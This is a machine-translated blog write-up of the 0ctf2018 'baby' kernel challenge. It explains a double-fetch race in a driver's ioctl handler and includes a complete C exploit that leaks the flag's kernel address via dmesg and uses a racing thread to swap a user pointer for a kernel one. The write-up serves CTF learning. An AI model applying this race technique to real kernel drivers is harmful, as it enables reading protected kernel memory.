当前位置:网站首页>Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
Kernel PWN learning (4) -- double fetch & 0ctf2018 baby
2022-04-23 09:28:00 【azraelxuemo】
List of articles
In fact, generally speaking, the problem is not complicated , It's a very simple conditional competition
subject
The attachment
The attachment
In fact, you only need to download .tar.gz
Attachment analysis
Don't be fooled by naming , It's just a tar
there core.cpio It's not compressed , So we just need to
Inside this exp,exp,c core.cpio, as well as fs.sh You can delete
fs.sh It's actually helping us generate cpio
analysis init
Here you can see that the driver is baby.ko, Corresponding open /dev/baby You can access , There's nothing else to say , Because it is not opened here dmesg_restrict, So we can execute dmesg see printk The content of
Pack another core.cpio
analysis start.sh
It's not turned on SMAP Protect , That is, the kernel state can directly access user state data
Here is the configuration of non single core single thread startup , Can trigger conditional competition , Under possible debugging , We add -s
Analysis driven
There are not many functions in this , The next three are useless , Mainly the top three
ioctl
I don't know what's going on here , I recognize that there is a problem ,v2 That's our third parameter
This is actually when we ioctl(fd,a2,a3) Call directly
sub_25(fd,a2,a3), So let's analyze sub_25
sub_25
Two functions
The first function is leaked flag Kernel address , What is promised here is %p, That is the flag Type the address saved inside , You can see that is aFlagThisWillbe The address of
It holds our last flag
This is the second function
chk_range_not_ok
This is actually
return shangxian<(addr+pianyi)
Let's see what the upper limit means
Here, let's have a look through debugging
Very simple test code
#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
int main(){
int fd=open("/dev/baby",2);
int a=2;
ioctl(fd, 0x1337, &a);
close(fd);
}
Here's a question , I hope a big man can answer
Generally, we find the loading address through this method , But this is obviously wrong
Through here I found the address
The modified init, because flag Hard coded in the driver , test flag I deleted it, too
rax Assignment bit current_task
rdx The value is as above , It looks like I'm familiar with , Yes, this is the highest address of the user state , So through debugging, we found that ,*(_QWORD *)(__readgsqword((unsigned int)¤t_task) + 4952)
It is the highest address of the user state
Then combine with the concrete if Content , To satisfy if
Instructions =0x1337
shangxian>= Incoming address +16
shangxian>=(Doward) Incoming address +*(int *) Incoming address +8
These two comparisons actually mean
What we pass in is actually the address of a structure
struct flag_object{
long flag_addr;
long length;
}
So the first one shangxian Comparison is to judge whether the address of the structure we pass in is user state
The second judgment is our flag Is it user mode
Because what is passed in here is a pointer , We can use conditions to compete , When he passed if after , We put the structure of flag_addr Change to kernel mode
The length should also match ,strlen barring \0, So it is 33
At the same time, it will be compared one by one flag It is not the same , The same will print , So we can only modify the pointer through conditional competition
attack
Let the cat out of the flag Address
because printk It will only be displayed in the debugging information , So we need to check after performing corresponding operations dmesg, Of course, that is dmesg_restrict=0, That is, ordinary users can also see , Then, oh, comparison plus assignment
Construct our flag Structure
Write changes flag Subfunction of
finish It's a sign , After we send enough requests in the main function, we set it to 1
exp
#include<sys/ioctl.h>
#include<fcntl.h>
#include <unistd.h>
#include<pthread.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
long flag_addr;
void get_kernel_flag_addr(int fd){
ioctl(fd,0x6666, 1);
system("dmesg|tail >/tmp/1.txt");
FILE *fd1=fopen("/tmp/1.txt","r");
char buf[120];
while(fgets(buf,120,fd1)){
if(strstr(buf,"Your flag is at")){
char hex[17];
strncpy(hex,buf+31,16);
sscanf(hex,"%lx",&flag_addr);
break;
}
}
fclose(fd1);
}
struct flag_structure{
long addr;
long len;
};
char fake_flag[]="fake";
int finish=0;
void chang_flag_addr(struct flag_structure *s){
while(finish==0){
s->addr=flag_addr;// Change to kernel flag Address , Callback function
}
}
int main(){
int fd=open("/dev/baby",2);
get_kernel_flag_addr(fd);
struct flag_structure flag;
flag.addr=(long)fake_flag;
flag.len=33;
pthread_t p1;
pthread_create(&p1, NULL,chang_flag_addr,&flag);//first parm is addr of pthread object,second set NULL,third is the callback_fun addr,fourth is the param
for(int i=0;i<10000;i++)
{
ioctl(fd, 0x1337, &flag);
flag.addr=(long )fake_flag;//we must modify addr to user space ,otherwith we can not pass if check
}
finish=1;
system("dmesg|grep flag{");
close(fd);
}
版权声明
本文为[azraelxuemo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204230924486081.html
边栏推荐
- Operation not allowed for a result set of type resultset TYPE_ FORWARD_ ONLY. Explain in detail
- Detailed explanation of delete, truncate and drop principles in MySQL database
- DMP engine work summary (2021, lightsaber)
- Common errors of VMware building es8
- How does kubernetes use harbor to pull private images
- 501. Mode in binary search tree
- 小程序报错:Cannot read property 'currentTarget' of undefined
- Kettle实验 (三)
- Summary of wrong questions 1
- MySQL small exercise (only suitable for beginners, non beginners are not allowed to enter)
猜你喜欢
如何实现根据照片获取地理位置及如何防御照片泄漏地理位置
Go language learning notes - exception handling | go language from scratch
Mini - exercice MySQL (seulement pour les débutants, pas pour les non - débutants)
MySQL small exercise (only suitable for beginners, non beginners are not allowed to enter)
Distributed message oriented middleware framework selection - Digital Architecture Design (7)
JS what is an event? Event three elements and operation elements
阿里云架构师解读四大主流游戏架构
Go language learning notes - language interface | go language from scratch
Canary publishing using ingress
112. 路径总和
随机推荐
JS what is an event? Event three elements and operation elements
1 + X cloud computing intermediate -- script construction, read-write separation
Write down the post order traversal of the ~ binary tree
Emuelec compilation summary
501. 二叉搜索树中的众数
[Luke V0] verification environment 2 - Verification Environment components
Give the method of instantiating the object to the new object
Chapter VIII project stakeholder management of information system project manager summary
员工试用期转正申请书(泸州老窖)
考研线性代数常见概念、问题总结
Trc20 fund collection solution based on thinkphp5 version
I don't understand time, timestamp and time zone. Look at this article
Set the maximum width of the body, but why does the background color of the body cover the whole page?
Thread scheduling (priority)
[C language] document operation
3、 6 [Verilog HDL] gate level modeling of basic knowledge
搞不懂时间、时间戳、时区,快来看这篇
基于ThinkPHP5版本TRC20-资金归集解决方案
Three challenges that a successful Devops leader should be aware of
[SQL Server fast track] view and cursor of database